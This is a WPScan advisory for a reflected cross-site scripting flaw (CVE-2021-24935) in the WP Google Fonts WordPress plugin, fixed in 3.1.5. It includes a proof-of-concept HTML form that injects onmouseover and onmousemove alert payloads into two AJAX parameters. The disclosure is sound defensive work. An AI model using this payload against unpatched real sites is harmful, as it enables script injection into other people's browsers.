WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Google Fonts < 3.1.5 - Reflected Cross-Site Scripting

Description

The plugin does not escape the googlefont_ajax_name and googlefont_ajax_family parameter of the googlefont_action AJAx action (available to any authenticated user) before outputing them in attributes, leading Reflected Cross-Site Scripting issues

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
        <input type="hidden" name="action" value="googlefont_action" />
        <input type="hidden" name="googlefont_ajax_name" value='" onmouseover=alert(/XSS-1/) t="' />
        <input type="hidden" name="googlefont_ajax_family" value='"onmousemove=alert(/XSS-2/)//' />
        <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    //form1.submit();
</script>
</html>


The XSS from the googlefont_ajax_name will be triggered when the mouse will be over any of the checkbox. The one from googlefont_ajax_family  will be triggered only in section 1 and 4

Affects Plugins

wp-google-fonts
Fixed in version 3.1.5

References

CVE
CVE-2021-24935
URL
https://plugins.trac.wordpress.org/changeset/2623659

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

JrXnm

Submitter

JrXnm

Submitter website
https://blog.szfszf.top/
Submitter twitter
JrXnm
Verified

Yes

WPVDB ID
53702281-1bd5-4828-b7a4-9f81cf0b6bb6

Timeline

Publicly Published

2021-11-03 (about 9 months ago)

Added

2021-11-03 (about 9 months ago)

Last Updated

2022-04-13 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin